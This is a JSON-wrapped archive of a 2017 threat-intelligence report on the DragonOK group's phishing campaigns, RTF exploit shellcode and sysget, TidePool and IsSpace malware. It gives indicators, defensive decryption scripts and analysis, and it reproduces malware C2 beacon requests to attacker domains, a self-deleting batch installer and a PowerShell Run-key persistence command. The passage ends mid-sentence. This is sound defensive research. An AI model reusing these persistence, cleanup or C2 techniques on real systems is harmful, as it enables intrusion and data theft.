{ "id": "ae673c52-e192-4022-9be2-8dbdf79cdc1c", "created_at": "2026-04-06T00:12:20.449063Z", "updated_at": "2026-04-10T03:34:17.313877Z", "deleted_at": null, "sha1_hash": "f4c1371ead52fc9c24313563bf94349006cb165d", "title": "DragonOK Updates Toolset and Targets Multiple Geographic Regions", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2227581, "plain_text": "DragonOK Updates Toolset and Targets Multiple Geographic\r\nRegions\r\nBy Josh Grunzweig\r\nPublished: 2017-01-05 · Archived: 2026-04-02 11:11:42 UTC\r\nThe DragonOK group has been actively launching attacks for years. We first discussed them in April 2015 when\r\nwe witnessed them targeting a number of organizations in Japan. In recent months, Unit 42 has observed a number\r\nof attacks that we attribute to this group. Multiple new variants of the previously discussed sysget malware family\r\nhave been observed in use by DragonOK. Sysget malware was delivered both directly via phishing emails, as well\r\nas in Rich Text Format (RTF) documents exploiting the CVE-2015-1641 vulnerability (patched in MS15-033) that\r\nin turn leveraged a very unique shellcode. Additionally, we have observed instances of the IsSpace and TidePool\r\nmalware families being delivered via the same techniques. While Japan is still the most heavily targeted\r\ngeographic region by this particular actor, we also observed instances where individuals or organizations in\r\nTaiwan, Tibet, and Russia also may have been targeted.\r\nInfiltration\r\nWe observed two unique techniques of infiltration for this particular campaign:\r\n1. Phishing emails being sent with malicious executables directly attached\r\n2. Malicious RTF files which exploit CVE-2015-1641.\r\nThe phishing emails had the following characteristics:\r\nEmail Subjects\r\nPickup at the Juanda Airport (1-Sep)\r\nポイントプレゼントのお知らせ [Roughly Translated: Point gift announcement]\r\n20周年記念パーティー [Roughly Translated: 20th Anniversary Party]\r\n参加者の10周年記念同窓会一覧 [Roughly Translated: List of participants' 10th anniversary alumni\r\nassociation]\r\n子供の調査連れ [Roughly Translated: Children's investigation]\r\nG20 report\r\n記念日の再会 [Roughly Translated: Anniversary reunion]\r\n最新の人事異動通知 [Roughly Translated: Recent personnel change notice]\r\nAttachment Filenames\r\nG20 report.exe\r\nexe\r\nList of Participants.exe\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 1 of 28\n\nRegistration form.exe\r\nThese emails targeted the following industries in Japan:\r\nManufacturing\r\nHigher Education\r\nEnergy\r\nTechnology\r\nSemiconductor\r\nThe malicious RTF files in question leverage a very specific shellcode to drop and execute the malicious payload,\r\nas well as a decoy document. Decoy documents are legitimate benign documents that are opened after the\r\nmalicious payload is delivered, thus ensuring that the victim does not become suspicious because their expected\r\ndocument opened as expected.\r\nTwo samples were found to include the decoy document show in Figure 1.\r\nThe title of the document roughly translates to “Ministry of Communications \u0026 Departments Authorities Empty\r\nSites and Hosted Public Works Source Clearance Photos”. The use of traditional Chinese indicators the target\r\nlikely residing in either Taiwan, Hong Kong, or Macau. However, based on the Taiwanese subject matter in this\r\ndocument, we can safely come to the conclusion that the intended victim was of Taiwanese origin. These samples\r\ndelivered an updated version of the IsSpace malware family, which was discussed previously in a watering hole\r\nattack targeting an aerospace firm. IsSpace is an evolved variant of the NFlog backdoor, which has been used by\r\nDragonOK in the past.\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 2 of 28\n\nFigure 1 Taiwanese decoy document\r\nTwo other samples were identified that used a Tibet-themed decoy document. The document in question (Figure 2)\r\nappears to be an internal newsletter from the Central Tibetan Ministry, as suggested by the logo used as well as the\r\ncontent of the document itself.  This document indicates that the malware may have been targeted towards an\r\nindividual that is interested in Tibetan affairs. These particular samples were unique in that they delivered the\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 3 of 28\n\nTidePool malware family that we reported on in May of 2016. We have not previously observed DragonOK using\r\nTidePool in attacks.\r\nFigure 2 Tibetan decoy document containing internal newsletter\r\nWe also identified an additional sample using decoy targeting Taiwanese victims (Figure 3), which deployed a\r\nnewer sysget sample.\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 4 of 28\n\nFigure 3 Taiwanese-targeted decoy document\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 5 of 28\n\nOther new samples associated with this group used a Russian language decoy document (Figure 4.) The decoy\r\ndocument in question discusses the GOST block cipher, which was created by the Russian government in the\r\n1970’s. The combination of Russian language and Russian-specific subject matter indicates that the intended\r\nvictim speaks Russian and may be interested in encryption. Like the previously discussed Tibetan decoy\r\ndocuments, these samples also delivered the TidePool malware family.\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 6 of 28\n\nFigure 4 Russian decoy document discussing the GOST block cipher\r\nFinally, multiple samples used a traditional Chinese language decoy document that discussed a subsidy welfare\r\nadjustment program. The use of traditional Chinese indicators the target likely residing in either Taiwan, Hong\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 7 of 28\n\nKong, or Macau. Similar to other attacks witnessed, a variant of the sysget malware family is installed by these\r\nfiles.\r\nFigure 5 Decoy document discussing subsidy welfare adjustment program\r\nMalware Deployed\r\nIn looking at the various malware samples used in attempted attacks, the following four families were identified:\r\nSysget version 2\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 8 of 28\n\nSysget version 3\r\nTidePool\r\nIsSpace\r\nWe broke the sysget classification into multiple variants when we found that a number of changes have been made\r\nsince our April 2015 report. Major distinctions between the versions of sysget include the following:\r\nSysget version 2\r\nRemoved support for persistence on Windows XP\r\nReworked the URIs used for network communication\r\nAdded additional layers of encryption for network communication and stored configuration files\r\nSwitched from RC4 to AES-128\r\nSysget version 3\r\nNumerous anti-debug and anti-vm procedures added\r\nEncrypted URIs in network communication with an initial static key\r\nIn addition, we observed a sysget version 4 that was discovered in another sample during our research. This\r\nversion is not attributed to a specific attack against an organization.\r\nIndicators of compromise related to sysget version 4 and other samples not directly attributed to specific attacks\r\nmay be found in the Appendix of this blog post.  Additionally, more information about the various sysget variants\r\nmay also be found in the Appendix.\r\nThe TidePool samples encountered are consistent with the samples previously discussed. I encourage readers to\r\nview our previous blog post to learn more about the intricacies of this particular malware family.\r\nThe IsSpace malware sample, however, looks to have been updated since last we wrote on it. While the available\r\ncommands from the command and control (C2) server remains the same, the URI structure of the network\r\ncommunication has been modified. Additionally, the installation routine for this malware family has been updated\r\nto be far less complex than previous discussed versions, favoring PowerShell to set persistence and forgoing the\r\npreviously used side-loading technique. A more detailed analysis of the new instances of IsSpace may be found at\r\nthe end of this blog post in the Appendix.\r\nInfrastructure\r\nA number of unique domains were employed by the various Trojans used in these attacks. For the numerous\r\ninstances of sysget we observed, the following domains were observed for their C2:\r\nkr44.78host[.]com\r\ngtoimage[.]com\r\ngogolekr[.]com\r\nAll of the above domains have Chinese WHOIS registrant details. Additionally, the gotoimage[.]com and\r\ntrend.gogolekr[.]com are both registered to the same registrant and resolve to the same netblock of\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 9 of 28\n\n104.202.173.0/24.\r\nThe instances of TidePool identified communicated with the following C2 servers:\r\neurope.wikaba[.]com\r\nrussiaboy.ssl443[.]org\r\ncool.skywave[.]top\r\nThese domains did not have many definitive relations with the sysget C2 servers except for cool.skywave[.]top,\r\nwhich shared a unique registrant email with the sysget C2 server of trend.gogolekr[.]com. Additionally, the\r\ngeographic region of the resolved IPs was consistent with the previous set, as they all resolved to various regions\r\nin southeast Asia. Specifically, the domains resolved to China, Korea, and Taiwan in the past six months.\r\nThe IsSpace samples resolved to the following domains:\r\nwww.dppline[.]org\r\nwww.matrens[.]top\r\nThese domains had no apparent connections to the previously discussed C2 servers, other than the fact that they\r\nresolved to Korea and Hong Kong respectively. Additionally, the registrar of ‘Jiangsu Bangning Science and\r\ntechnology Co. Ltd.’ was used for a large number of domains. A full graph of the relations between the various\r\nattacks is shown in Figure 6.\r\nFigure 6 Relationships between attacks\r\nConclusion\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 10 of 28\n\nThe DragonOK group are quite active and continue updating their tools and tactics. Their toolset is being actively\r\ndeveloped to make detection and analysis more difficult. Additionally, they appear to be using additional malware\r\ntoolsets such as TidePool. While Japan is still the most-targeted region by this group, they look to be seeking out\r\nvictims in other regions as well, such as Taiwan, Tibet, and Russia.\r\nPalo Alto Network customers are protected against this threat in the following ways:\r\nMalware families are tagged in AutoFocus via a variety of tags (TidePool, NFlog, Sysget)\r\nThe following IPS signatures detect malicious network traffic:\r\nIPS signature 14365 (IsSpace.Gen Command And Control Traffic)\r\nIPS signature 14588 (Suspicious.Gen Command And Control Traffic)\r\nIPS signature 13574 (NfLog.Gen Command And Control Traffic)\r\nIPS signature 13359 (Nflog.Gen Command And Control Traffic)\r\nAll samples are appropriately marked malicious in WildFire\r\nAppendix\r\nCVE-2015-1641 Exploit and Shellcode\r\nThis particular group uses a very specific shellcode payload when exploiting CVE-2015-1641. This CVE is\r\nmemory corruption vulnerability which allows for arbitrary code execution in various versions of Microsoft\r\nOffice, including 2007, 2010, and 2013.\r\nThe shellcode begins by dynamically loading a small number of API functions from kernel32. A number of hashes\r\nare included that represent function names, which have a rotate right 7 (ROR7) operation applied against them\r\nbefore being XORed against a key of “\\x10\\xAD\\xBE\\xEF”. The ROR7 operation is a very common technique in\r\nshellcode to obfuscate what functions are being called. The author added the XOR operation to add another layer\r\nof obfuscation.\r\nFigure 7 API function hashes contained in shellcode\r\nAfter the shellcode loads the necessary API functions, it proceeds to seek out a number of markers that will mark\r\nthe beginning and ending of both an embedded malicious payload, as well as a decoy document.\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 11 of 28\n\nThe malicious executable is marked with a starting point of 0xBABABABABABA and an end marker of\r\n0xBBBBBBBB. The decoy document is found immediately after the end of the malicious payload, and has an end\r\nmarker of 0xBCBCBCBC. Both executables are encrypted with a 4-byte XOR key. Should the original data\r\ncontain 0x00000000, it will not have the XOR applied against it.\r\nThe malicious payload is XORed against a key of 0xCAFEBEEF and the decoy document is XORed against\r\n0xBAADF00D. The following script may be applied against the RTF document to extract both the malicious\r\npayload and the decoy:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\nimport sys, binascii\r\nfrom itertools import cycle, izip\r\nimport re\r\ndef xor(message, key):\r\n  return ''.join(chr(ord(c)^ord(k)) for c,k in izip(message, cycle(key)))\r\ndef decrypt(data, key):\r\n  output = \"\"\r\n  iteration = 4\r\n  position = 0\r\n  while True:\r\n    window = data[position:position+iteration]\r\n    if window == \"\\x00\\x00\\x00\\x00\":\r\n      output += window\r\n    else:\r\n      output += xor(window, key)\r\n    position += iteration\r\n    if position == len(data) or position \u003e len(data):\r\n      break\r\n  return output\r\ndef extract(data):\r\n  exe_data, doc_data = None, None\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 12 of 28\n\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n47\r\n  exe_starting_point = data.index(\"\\xBA\\xBA\\xBA\\xBA\\xBA\\xBA\") + 6\r\n  exe_ending_point = None\r\n  ending_points = [m.start() for m in re.finditer(\"\\xBB\\xBB\\xBB\\xBB\", data)]\r\n  for e in ending_points:\r\n    if e \u003e exe_starting_point:\r\n      exe_ending_point = e\r\n  if exe_starting_point and exe_ending_point:\r\n    mz_data = data[exe_starting_point:exe_ending_point]\r\n    exe_data = decrypt(mz_data, \"\\xBE\\xBA\\xFE\\xCA\")\r\n  else:\r\n    raise Exception(\"Unable to find correct offsets for executable.\")\r\n  doc_starting_point = exe_ending_point + 4\r\n  doc_ending_point = None\r\n  ending_points = [m.start() for m in re.finditer(\"\\xBC\\xBC\\xBC\\xBC\", data)]\r\n  for e in ending_points:\r\n    if e \u003e doc_starting_point:\r\n      doc_ending_point = e\r\n  if doc_starting_point and doc_ending_point:\r\n    doc = data[doc_starting_point:doc_ending_point]\r\n    doc_data = decrypt(doc, \"\\x0D\\xF0\\xAD\\xBA\")\r\n  else:\r\n    raise Exception(\"Unable to find correct offsets for document.\")\r\n  return [exe_data, doc_data]\r\ndef main():\r\n  input_file = sys.argv[1]\r\n  input_fh = open(input_file, 'rb')\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 13 of 28\n\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\n54\r\n55\r\n56\r\n57\r\n58\r\n59\r\n60\r\n61\r\n62\r\n63\r\n64\r\n65\r\n66\r\n67\r\n68\r\n69\r\n70\r\n71\r\n72\r\n73\r\n  input_data = input_fh.read()\r\n  input_fh.close()\r\n  exe, doc = extract(input_data)\r\n  filename = \"{}.exe\".format(input_file)\r\n  output_file = open(filename, 'wb')\r\n  output_file.write(exe)\r\n  output_file.close()\r\n  print \"[+] Wrote {}\".format(filename)\r\n  filename = \"{}.doc\".format(input_file)\r\n  output_file = open(filename, 'wb')\r\n  output_file.write(doc)\r\n  output_file.close()\r\n  print \"[+] Wrote {}\".format(filename)\r\nif len(sys.argv) == 2 and __name__ == \"__main__\":\r\n  main()\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 14 of 28\n\n74\r\nWhen both files are decrypted, they are written to the following location in the %TEMP% directory:\r\n../..exe\r\n../..doc\r\nNote the initial ‘..’, which represents the parent directory of %TEMP%. This coupled with the unusual names of\r\n..exe and ..doc make this particular shellcode very unique, which is one way we have attributed these samples to\r\nthe same group. After the samples have been written, they are executed via calls to WinExec.\r\nSysget v2 Analysis\r\nOne of the fundamental changes witnessed in the second iteration of sysget is removing support for Windows XP\r\nand lower. Other changes include modifications to the URIs used for network communication.\r\nLike the original version of sysget, sysget v2 still uses a named event of ‘mcsong[]’ to ensure a single instance is\r\nrunning at a time. It proceeds to make attempts at copying itself to the %STARTUP%/notilv.exe path. However, it\r\nuses COM objects to perform this action that is not available in Windows XP, which prevents the malware from\r\ninstalling itself to this location. While the remainder of the malware operates as expected, it will not survive a\r\nrestart of the system.\r\nSysget proceeds to make an attempt at reading the following configuration file. This filename and path has\r\nchanged since the original version, and is consistent in the subsequent versions.\r\n%APPDATA%/vklCen5.tmp\r\nThis configuration file holds both a unique victim identifier, as well as a key that is used to encrypt HTTP traffic.\r\nIt is encrypted using the AES-128 encryption algorithm, using a static key of ‘734thfg9ih’. Using AES-128 is a\r\nchange from the previous version, where RC4 was used for all encryption operations. The following Python code\r\nmay be used to decrypt this file:\r\nimport sys\r\nimport base64\r\nfrom wincrypto import CryptCreateHash, CryptHashData, CryptDeriveKey, CryptDecrypt\r\ndef decrypt(data, original_key):\r\nCALG_AES_128 = 0x660E\r\nCALG_MD5 = 0x8003\r\nmd5_hasher = CryptCreateHash(CALG_MD5)\r\nCryptHashData(md5_hasher, original_key)\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 15 of 28\n\nkey = CryptDeriveKey(md5_hasher, CALG_AES_128)\r\ndecrypted_data = CryptDecrypt(key, data)\r\nreturn decrypted_data\r\narg = open(sys.argv[1], 'rb').read()\r\nprint repr(decrypt(arg, '734thfg9ih'))\r\nWhen executed against an example configuration file, we see the following output, which includes the two pieces\r\nof data noted previously:\r\nC:\\\u003epython decrypt_config.py vklCen5.tmp\r\n'gh1443717133\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\r\nx00\\x00\\x00\\x00\\x001059086204\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\r\nx00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'\r\nThe encryption of this configuration file is a new feature that was not present in the original version of sysget.\r\nIf this file is not present on the system, the malware will attempt to retrieve the necessary information via a HTTP\r\nrequest. The following request is made to the remote command and control server. Note that the full URI is\r\nstatically set by the malware sample.\r\nGET /index.php?type=read\u0026id=1420efbd80ce02328663631c8d8f813c\u0026pageinfo=jp\u0026lang=\r\nutf-8 HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like\r\nGecko) Chrome/40.0.2214.115 Safari/537.36\r\nHost: hello.newtaiwan[.]top\r\nThe server responds with the following data, encrypted using the same technique previously described with a\r\nstatic key of ‘aliado75496’. Once decrypted, we see the following example data being sent back to sysget:\r\ngh1443717133\\n1059086204\\n\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 16 of 28\n\nThe first string is used as a key for all subsequent network communication. The second string is treated as a\r\nunique victim identifier. This data is encrypted using the key of ‘734thfg9ih’ and written to the\r\n%APPDATA%/vklCen5.tmp file.\r\nAfter this information has been obtained, the malware proceeds to enter its command and control loop. An HTTP\r\nrequest such as the following is made to the remote server. Note that the ‘mid’ GET variable holds the MD5 hash\r\nof the previously obtained victim identifier. The remaining data in the URI is hardcoded.\r\nGET /index.php?type=get\u0026pageinfo=bridge03443\u0026lang=jp\u0026mid=5717cb8fed2750a2ee9e8\r\n30a30716ed4 HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/40.0.2214.115 Safari/537.36\r\nHost: hello.newtaiwan[.]top\r\nThe response is encrypted using the unique key that was obtained previously. Should the response contain ‘Fatal\r\nerror’ unencrypted, no further actions are taken by the malware sample. Once decrypted, the response may have\r\none of the following two choices, and their accompanying purpose. Alternatively, if a raw command is provided,\r\nthe malware will execute it and return the results.\r\nCommand Description\r\ngoto wrong \"[file_path]\";\\n Read a specific file and return its contents.\r\ngoto right \"[filename]\" \"\r\n[identifier]\"\r\nWrite a given file. The identifier is used to retrieve the file’s contents in a\r\nsubsequent HTTP request.\r\nWhen the ‘goto wrong’ request is made, a HTTP POST request is made to the following URI. In the following\r\nURI, the ‘list’ parameter contains the MD5 hash of the victim’s identifier.\r\n/index.php?type=register\u0026pageinfo=myid32987\u0026list=5717cb8fed2750a2ee9e830a3\r\n0716ed4\r\nThe contents of this POST request contains the victim’s identifier, as well as the file’s contents encrypted with the\r\nunique key. The first 50 bytes are reserved for the victim identifier, as shown below:\r\n0000016F  35 37 31 37 63 62 38 66  65 64 32 37 35 30 61 32 5717cb8f ed2750a2\r\n0000017F  65 65 39 65 38 33 30 61  33 30 37 31 36 65 64 34 ee9e830a 30716ed4\r\n0000018F  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 17 of 28\n\n0000019F  00 00 4b 59 bc 53 53 99  2b 6f a7 b5 5a 85 c7 66 ..KY.SS. +o..Z..f\r\nOnce decrypted, the data contains both the filename, as well as the contents of that file.\r\ntest.txt\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00[TRUNCATED]\\x\r\n00\\x00\\x00file contents\r\nIf the ‘goto right’ command is used, the malware will make a subsequent request to the following URI. The\r\n‘cache’ variable holds the unique identifier that was provided in the ‘goto right’ command.\r\n/index.php?type=goto\u0026pageinfo=myid47386\u0026cache=identifier\r\nOnce the file contents are obtained, they are written to the specified filename in the %STARTUP% folder.\r\nWhen a raw command is received, the malware will upload the results to the following URI via a POST request:\r\n/index.php?type=register\r\nAn overview of the network communications exhibited by sysget version 2 can be seen in the figure below.\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 18 of 28\n\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 19 of 28\n\nFigure 8 Sysget version 2 command and control flow\r\nSysget v3 Analysis\r\nSome of the biggest changes witnessed in version 3 of sysget includes numerous anti-debug and anti-vm\r\ndetections added, as well as the encryption of the URIs used for network communication.\r\nWhen the malware initially executes, it performs the following checks to ensure it is not being debugged and not\r\nrunning in a sandbox or virtualized environment.\r\nShould these checks return false, the malware proceeds to enter its installation routine. The malware originally\r\ncopies itself to a temp file in the %TEMP% directory with a filename prefix of ‘00’. It proceeds to append\r\n4194304 bytes of randomly chosen data to the end of this file. The increased filesize may have been added by the\r\nauthor in an attempt to thwart sandboxes that impose filesize limits on what is saved and/or processed. Finally, the\r\nmalware copies the original file from the tmp path to the %STARTUP%/winlogon.exe path using the same\r\ntechnique witnessed in version 2. Sysget then writes a batch script in the %TEMP% folder with the following\r\ncontents, cleaning up the original files and spawning the newly written winlogon.exe executable:\r\n@echo off\r\n:t\r\ntimeout 1\r\nfor /f %%i in ('tasklist /FI \"IMAGENAME eq [original_executable_name]\" ^| find /v /c \"\"' ) do set\r\nYO=%%i\r\nif %%YO%%==4 goto :t\r\ndel /F \"[original_executable_path]\"\r\ndel /F \"[tmp_file]\"\r\nstart /B cmd /c \"[startup_winlogon.exe]\"\r\ndel /F \"[self]\"\r\nexit\r\nAfter installation, sysget will attempt to read the same %APPDATA%/vklCen5.tmp file as witnessed in the\r\nprevious variant. A number of strings within the malware, including the ‘734thfg9ih’ key used to encrypt this file,\r\nhave been obfuscated via a single-byte XOR of 0x5F.\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 20 of 28\n\nSimilar to previous versions, should this vklCen5.tmp file not be present on the victim machine, it will make an\r\nexternal HTTP request to retrieve the necessary information. The following request is made by the malware.\r\nReaders will notice that the URI has changed from previous versions in a number of ways. This version of sysget\r\nlooks to always make requests to 1.php, which is hardcoded within the malware itself. Additionally, all HTTP\r\nURIs in this version of sysget are encrypted. The initial GET request made to retrieve the victim identifier and\r\nunique key is encrypted with a key of ‘Cra%hello-12sW’. The subsequent response containing this information is\r\nthen decrypted using a key of ‘aliado75496’, which is consistent with previous versions.\r\nGET\r\n/1.php?K+50lkzq7OtigRtWY7Z5DwkmxRhFd5n3UXyH+Flfa0S8f5h3nl6XBDMa6a3IbDiPQqW\r\nSwZh7lQRmIPLlC8Wmfr8cGv7raGEV160r73FJjnOfyJPLEKWAIyJnfPZhHdGapA6tfwfwj24TN\r\n4QbBrMJkVCLPPZoI4HNtdDEo6G3ujjyvkpWnGQnRBi6DzylNrMypV/K6Ft32dsMmmO52q4IdQ==\r\nHTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like\r\nGecko) Chrome/40.0.2214.115 Safari/537.36\r\nHost: gtoimage.com\r\nWhen the URI above is base64-decoded and subsequently decrypted, we see the following:\r\nindex.php?type=read\u0026id=692fdc3c7b2c310fc017e4af335b8dc8\u0026pageinfo=jp\u0026lang=utf-8\r\nThis URI is consistent with the previous sysget variant. It would seem the authors simply have added this layer of\r\nencryption to hinder efforts to block the malware via network-based detections.\r\nAfter this initial request to retrieve the victim identifier and unique key, sysget enters its command and control\r\nloop. This process is consistent with the previous version, but simply has the extra layer of encryption used for the\r\nURIs.\r\nSysget v4 Analysis\r\nThe fourth variant of sysget is nearly identical to the third variant. However, the main difference lies in the URIs\r\nused for network communication. In addition to the expected encryption of the URIs, this variant also mangles the\r\nbase64 encoding that is performed afterwards. The following Python script may be used to de-obfuscate the\r\nbase64 URI found in this variant:\r\n1 import base64\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 21 of 28\n\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n'''\r\nURI Request:\r\nGET\r\n/5.php?62H72xihwn4LqfdOqTV4W2AthjuOeCa2k0RUvE7CicXxN2MWFre2pqH8gIdMMJQbzS0\r\nAMo+rT4GGalhcebmCbjdrjZlyDhmUjE7QO5mIXZTAucGt3LeLXxOxGiV1G4zecHSPAX3AiAeR+\r\nBGFsc3wtMhOWzXfithXYeCKnjh1O7pXsYqyKqfl=HpVzs4YXZb=UQY=BNEnr/77jW5JTLNI4aed\r\n99 HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML,\r\nlike Gecko) Chrome/40.0.2214.115 Safari/537.36\r\nHost: www.sanseitime.com\r\n'''\r\nuri_string =\r\n\"62H72xihwn4LqfdOqTV4W2AthjuOeCa2k0RUvE7CicXxN2MWFre2pqH8gIdMMJQbzS0AMo+rT\r\n4GGalhcebmCbjdrjZlyDhmUjE7QO5mIXZTAucGt3LeLXxOxGiV1G4zecHSPAX3AiAeR+BGFsc3\r\nwtMhOWzXfithXYeCKnjh1O7pXsYqyKqfl=HpVzs4YXZb=UQY=BNEnr/77jW5JTLNI4aed99\"\r\nb64_string =\r\n\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\"\r\nprefix_int = int(uri_string[0:2])\r\nout = \"\"\r\nfor u in uri_string[2:]:\r\nind = b64_string.index(u) - prefix_int\r\nout += b64_string[ind]\r\ndecoded = base64.b64decode(out)\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 22 of 28\n\n28\r\n29\r\n30\r\n31\r\nAdditionally, the C2 URI changes in this variant, from 1.php to 5.php\r\nIsSpace Analysis\r\nWhen initially run, IsSpace will create a unique event to ensure a single instance of the malware is running at a\r\ngiven time. This event name appears to be unique per the sample, as multiple samples contained unique event\r\nnames. The following event names have been observed in the samples that were analyzed:\r\ne6al69MS5iP\r\nv485ILa3q5z\r\nIsSpace proceeds to iterate over the running processes on the system, seeking out the following two process\r\nsubstrings:\r\nuiSeAgnt\r\navp.exe\r\nThe uiSeAgnt string may be related to Trend Micro’s solutions, while avp.exe most likely is related to Kaspersky’s\r\nanti-malware product.\r\nIn the event uiSeAgnt is identified, the malware will enter its installation routine if not already running as\r\n‘bfsuc.exe’ and proceeds to exit afterwards. Should avp.exe be identified, the malware enters an infinite sleep loop\r\nuntil a mouse click occurs. After this takes place, the malware proceeds as normal.\r\nThe malware then determines if it is running under Windows XP. In the event that it is, it will make a HTTP GET\r\nrequest to www.bing.com, presumably to ensure network connectivity.\r\nFigure 9 IsSpace connecting to www.bing.com\r\nIf the malware is not running on Windows XP, it will attempt to obtain and decrypt any basic authentication\r\ncredentials from Internet Explorer. This information is used in subsequent HTTP requests in the event a 407\r\n(Proxy Authentication Required) or 401 (Unauthorized) response code is received during network communication.\r\nIsSpace will then enter its installation routine, where it will first copy itself to the %LOCALAPPDATA% folder\r\nwith a name of ‘bfsuc.exe’.  It then sets the proper registry key for persistence by executing the following\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 23 of 28\n\nPowerShell command:\r\nC:\\Windows\\system32\\cmd.exe /C Powershell.exe New-ItemProperty -Path\r\nHKCU:SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Run -Name Identity -\r\nPropertyType String -Value c:\\users\\josh grunzweig\\appdata\\local\\bfsuc.exe\r\n-force\r\nThe malware then makes an initial HTTP POST request to the configured C2 server. It will make this request to\r\nthe ‘/news/Senmsip.asp’ URI. The POST data is XORed against a key of “\\x35\\x8E\\x9D\\x7A”, which is\r\nconsistent with previous versions of IsSpace and NFlog. Decrypted, the POST data reads “01234567890”. The C2\r\nserver in turn will respond with the victim’s external IP address.\r\nFigure 10 Initial IsSpace beacon\r\nIsSpace then spawns two threads that will make HTTP requests to the following URIs:\r\n/news/Sennw.asp?rsv_info=[MAC_ADDRESS]\r\n/news/Sentire.asp?rsv_info=[MAC_ADDRESS]\r\nThe ‘Sennw.asp’ POST requests that are made contain collected victim information. They, like other information\r\nsent across the network, are encrypted using the previously mentioned 4-byte XOR key. When decrypted, we are\r\nprovided with information such as the following:\r\n60-F8-1D-CC-2F-CF#%#172.16.95.1#%#172.16.95.186#%#WIN-LJLV2NKIOKP#%#Win7#%#English(US)#%#2016-12-20\r\n16:27:12#%#Active#%#xp20160628#%#IsAdmins#%#False\r\nThe information, delimited via ‘#%#’, is as follows:\r\nValue Description\r\nhttps://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/\r\nPage 24 of 28\n\n60-F8-1D-CC-2F-CF MAC address\r\n172.16.95.1 External IP collected previously\r\n172.16.95.186 Internal IP address\r\nWIN-LJLV2NKIOKP Hostname\r\nWin7 Windows version\r\nEnglish(US) Language\r\n2016-12-20 16:27:12 Timestamp\r\nActive Malware status. May also be ‘Sleep’\r\nxp20160628 Potential campaign identifier\r\nIsAdmins / False User admin status\r\nThe malware is 